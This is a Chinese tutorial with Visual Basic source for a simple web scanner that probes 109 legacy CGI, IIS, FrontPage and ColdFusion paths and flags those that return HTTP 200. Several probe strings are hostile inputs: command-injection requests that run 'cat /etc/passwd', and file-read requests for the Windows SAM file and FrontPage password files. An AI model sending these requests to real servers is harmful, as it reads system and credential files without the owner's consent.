如何用VB编写脚本漏洞扫描器
首先创建6个TextBox、2个CommandButton、1个ProgressBar、1个Inet控件(注:下面的代码实际引用了 Command1 至 Command4 共四个按钮)
然后写入代码:
' Form-level state shared by the button handlers.
' ch : URLs of the paths that answered with a success status (filled by Command1_Click).
' a  : index of the result currently shown in Text5 (moved by Command3/Command4).
' w  : number of results recorded by the last scan.
Private ch(109) As Variant
Private a As Variant
Private w As Variant
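Private Sub Command1_Click()
    ' Requests a fixed list of well-known legacy CGI / IIS / ColdFusion / Domino
    ' paths on the host typed into Text1 and records every path that answers
    ' with an HTTP 200 status line.
    '
    ' Outputs: Text2 = Server header, Text3 = hit count, Text4 = current index,
    '          Text5 = first recorded URL, Txtinfo = progress log,
    '          ch()/w/a = result list used by Command3/Command4.
    '
    ' Limits of the check: a 200 status only shows that the server answered the
    ' path. Servers that return 200 for custom error pages produce false
    ' positives, so every hit needs manual verification.
    ' On the server side this run appears in the access log as a burst of
    ' sequential requests for legacy sample/CGI paths from one client.
    '
    ' The Inet control raises run-time errors on connection failures; they are
    ' tolerated here, but each request is checked explicitly so that a failed
    ' request is never counted as a hit.
    On Error Resume Next

    Dim ip As String
    Dim baseUrl As String
    Dim bg(109) As String
    Dim h, h2
    Dim statusLine As String
    Dim requestFailed As Boolean
    Dim n As Integer
    Dim i As Integer

    ip = Trim$(Text1.Text)
    If Len(ip) = 0 Then
        Txtinfo.Text = "请先输入目标地址"
        Exit Sub
    End If

    ' Use one base URL for every request. The original prefixed "http://" only
    ' for the banner request and not for the path requests.
    If LCase$(Left$(ip, 7)) = "http://" Or LCase$(Left$(ip, 8)) = "https://" Then
        baseUrl = ip
    Else
        baseUrl = "http://" & ip
    End If
    ' Every path below starts with "/", so drop a trailing slash on the base.
    If Right$(baseUrl, 1) = "/" Then baseUrl = Left$(baseUrl, Len(baseUrl) - 1)

    ' Reset the state left by a previous scan so stale results are not shown.
    w = 0
    a = 1
    n = 0
    Erase ch

    ' NOTE(review): entries 44, 55 and 56 each hold several space-separated
    ' paths in one string and are requested as a single URL. Entries 4/108,
    ' 21/88, 31/75, 32/79, 33/77 and 80/92 are duplicates, so one path can be
    ' counted twice. The list is kept exactly as published.
    bg(1) = "/cgi-bin/formmail.pl"
    bg(2) = "/cgi-bin/printenv"
    bg(3) = "/cgi-bin/test-cgi"
    bg(4) = "/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd"
    bg(5) = "/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"
    bg(6) = "/cgi-bin/rwwwshell.pl"
    bg(7) = "/cgi-bin/phf"
    bg(8) = "/cgi-bin/Count.cgi"
    bg(9) = "/cgi-bin/test.cgi"
    bg(10) = "/cgi-bin/nph-test-cgi"
    bg(11) = "/cgi-bin/nph-publish"
    bg(12) = "/cgi-bin/php.cgi"
    bg(13) = "/cgi-bin/handler"
    bg(14) = "/cgi-bin/webgais"
    bg(15) = "/cgi-bin/websendmail"
    bg(16) = "/cgi-bin/webdist.cgi"
    bg(17) = "/cgi-bin/faxsurvey"
    bg(18) = "/cgi-bin/htmlscript"
    bg(19) = "/cgi-bin/pfdisplay.cgi"
    bg(20) = "/cgi-bin/perl.exe"
    bg(21) = "/cgi-bin/wwwboard.pl"
    bg(22) = "/cgi-bin/www-sql"
    bg(23) = "/cgi-bin/view-source"
    bg(24) = "/cgi-bin/campas"
    bg(25) = "/cgi-bin/aglimpse"
    bg(26) = "/cgi-bin/glimpse"
    bg(27) = "/cgi-bin/man.sh"
    bg(28) = "/cgi-bin/AT-admin.cgi"
    bg(29) = "/scripts/no-such-file.pl"
    bg(30) = "/_vti_bin/shtml.dll"
    bg(31) = "/_vti_inf.html"
    bg(32) = "/_vti_pvt/administrators.pwd"
    bg(33) = "/_vti_pvt/users.pwd"
    bg(34) = "/msadc/Samples/SelectOR/showcode.asp"
    bg(35) = "/scripts/iisadmin/ism.dll?http/dir"
    bg(36) = "/adsamples/config/site.csc"
    bg(37) = "/main.asp%81"
    bg(38) = "/AdvWorks/equipment/catalog_type.asp?"
    bg(39) = "/index.asp::$DATA"
    bg(40) = "/cgi-bin/visadmin.exe?user=guest"
    bg(41) = "/?PageServices"
    bg(42) = "/ss.cfg"
    bg(43) = "/cgi-bin/cachemgr.cgi"
    bg(44) = "/domcfg.nsf /today.nsf"
    bg(45) = "/names.nsf"
    bg(46) = "/catalog.nsf"
    bg(47) = "/log.nsf"
    bg(48) = "/domlog.nsf"
    bg(49) = "/cgi-bin/AT-generate.cgi"
    bg(50) = "/secure/.wwwacl"
    bg(51) = "/secure/.htaccess"
    bg(52) = "/samples/search/webhits.exe"
    bg(53) = "/scripts/srchadm/admin.idq"
    bg(54) = "/cgi-bin/dumpenv.pl"
    bg(55) = "/adminlogin?RCpage=/sysadmin/index.stm /c:/program"
    bg(56) = "/ncl_items.html?SUBJECT=2097 /cgi-bin/filemail.pl /cgi-bin/maillist.pl /cgi-bin/jj"
    bg(57) = "/getdrvrs.exe"
    bg(58) = "/test/test.cgi"
    bg(59) = "/scripts/submit.cgi"
    bg(60) = "/users/scripts/submit.cgi"
    bg(61) = "/cgi-bin/info2www"
    bg(62) = "/cgi-bin/files.pl"
    bg(63) = "/cgi-bin/finger"
    bg(64) = "/cgi-bin/bnbform.cgi"
    bg(65) = "/cgi-bin/survey.cgi"
    bg(66) = "/cgi-bin/AnyForm2"
    bg(67) = "/cgi-bin/textcounter.pl"
    bg(68) = "/cgi-bin/classifieds.cgi"
    bg(69) = "/cgi-bin/environ.cgi"
    bg(70) = "/cgi-bin/wrap"
    bg(71) = "/cgi-bin/cgiwrap"
    bg(72) = "/cgi-bin/guestbook.cgi"
    bg(73) = "/cgi-bin/edit.pl"
    bg(74) = "/cgi-bin/perlshop.cgi"
    bg(75) = "/_vti_inf.html"
    bg(76) = "/_vti_pvt/service.pwd"
    bg(77) = "/_vti_pvt/users.pwd"
    bg(78) = "/_vti_pvt/authors.pwd"
    bg(79) = "/_vti_pvt/administrators.pwd"
    bg(80) = "/cgi-win/uploader.exe"
    bg(81) = "/iisadmpwd/achg.htr"
    bg(82) = "/iisadmpwd/aexp.htr"
    bg(83) = "/iisadmpwd/aexp2.htr"
    bg(84) = "/cfdocs/expeval/openfile.cfm"
    bg(85) = "/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:WINNTrepairsam._"
    bg(86) = "/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:WINNTrepairsam._"
    bg(87) = "/CFIDE/Administrator/startstop.html"
    bg(88) = "/cgi-bin/wwwboard.pl"
    bg(89) = "/_vti_pvt/shtml.dll"
    bg(90) = "/_vti_pvt/shtml.exe"
    bg(91) = "/cgi-dos/args.bat"
    bg(92) = "/cgi-win/uploader.exe"
    bg(93) = "/cgi-bin/rguest.exe"
    bg(94) = "/cgi-bin/wguest.exe"
    bg(95) = "/scripts/issadmin/bdir.htr"
    bg(96) = "/scripts/CGImail.exe"
    bg(97) = "/scripts/tools/newdsn.exe"
    bg(98) = "/scripts/fpcount.exe"
    bg(99) = "/cfdocs/expelval/openfile.cfm"
    bg(100) = "/cfdocs/expelval/exprcalc.cfm"
    bg(101) = "/cfdocs/expelval/displayopenedfile.cfm"
    bg(102) = "/cfdocs/expelval/sendmail.cfm"
    bg(103) = "/iissamples/exair/howitworks/codebrws.asp"
    bg(104) = "/iissamples/sdk/asp/docs/codebrws.asp"
    bg(105) = "/msads/Samples/SelectOR/showcode.asp"
    bg(106) = "/search97.vts"
    bg(107) = "/carbo.dll"
    bg(108) = "/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd"
    bg(109) = "/doc"

    ' Size the progress bar to the list and start it from empty.
    ProgressBar1.Value = ProgressBar1.Min
    ProgressBar1.Max = UBound(bg)

    Txtinfo.Text = "扫描器正在准备..."

    ' Banner request: fetch the root page and show the Server header.
    Inet1.Cancel
    Inet1.URL = ""
    Inet1.OpenURL baseUrl, 1
    h = Inet1.GetHeader("server")
    Text2.Text = h

    Txtinfo.Text = Txtinfo.Text + vbCrLf & vbCrLf & "正在扫描 [" & ip & "]" & vbCrLf & vbCrLf

    For i = 1 To UBound(bg)
        h = ""
        statusLine = ""
        Inet1.URL = ""

        Err.Clear
        Inet1.OpenURL baseUrl & bg(i), 1
        requestFailed = (Err.Number <> 0)

        Text4.Text = i
        ProgressBar1.Value = i

        If Not requestFailed Then h = Inet1.GetHeader

        ' Index the header lines only when something came back. Under
        ' "On Error Resume Next" an error raised inside an If condition resumes
        ' INSIDE the If block, so the original h2(0) test on an empty response
        ' reported a failed request as a finding.
        If Len(h) > 0 Then
            h2 = Split(h, vbCrLf)
            statusLine = h2(0)
        End If

        ' Accept a 200 status from HTTP/1.0 and HTTP/1.1 servers alike.
        If statusLine Like "HTTP/1.[01] 200*" Then
            Txtinfo.Text = Txtinfo.Text + "发现漏洞! "
            n = n + 1
            ch(n) = Inet1.URL & vbCrLf & vbCrLf
            w = w + 1
            Text3.Text = w
        End If
    Next i

    Txtinfo.Text = Txtinfo.Text + "扫描完成" & vbCrLf & vbCrLf
    Text5.Text = ch(1)
End Sub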
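Private Sub Command2_Click()
    ' Exit button. "End" stops the program immediately without running the
    ' form's unload events, so the pending request is cancelled first and the
    ' form is unloaded normally instead.
    On Error Resume Next   ' Cancel may raise if no request is in progress
    Inet1.Cancel
    On Error GoTo 0
    Unload Me
End Sub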
Private Sub Command3_Click()
    ' "Previous result" button: steps the cursor a back by one and shows that
    ' entry of ch() in Text5. At the first entry it only shows a message box.
    If a <= 1 Then
        MsgBox "到顶了!", , "错误"
        Exit Sub
    End If

    a = a - 1
    Text5.Text = ch(a)
End Sub
Private Sub Command4_Click()
    ' "Next result" button: steps the cursor a forward by one and shows that
    ' entry of ch() in Text5. At the last recorded entry (a >= w) it only
    ' shows a message box.
    If a >= w Then
        MsgBox "到底了!", , "错误"
        Exit Sub
    End If

    a = a + 1
    Text5.Text = ch(a)
End Sub
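Private Sub Form_Load()
    ' Size the progress bar to the 109 paths checked by Command1_Click.
    ' The original "ProgressBar1 = 109" assigned the control's default
    ' property (Value), not Max, so the bar started out full and the
    ' per-request increment had nowhere to go.
    ' NOTE(review): if Max is still at the control's default, that assignment
    ' would presumably fail at load time - confirm against the form design.
    ProgressBar1.Min = 0
    ProgressBar1.Max = 109
    ProgressBar1.Value = 0
End Sub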
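这个程序可以扫描109个漏洞,比较实用。需要注意:程序只根据服务器返回的状态行是否为 "HTTP/1.1 200 OK" 来判断,这只能说明该路径存在并可访问,并不能确认漏洞真实存在(例如对不存在的页面也返回 200 的服务器会造成误报),扫描结果需要人工核实。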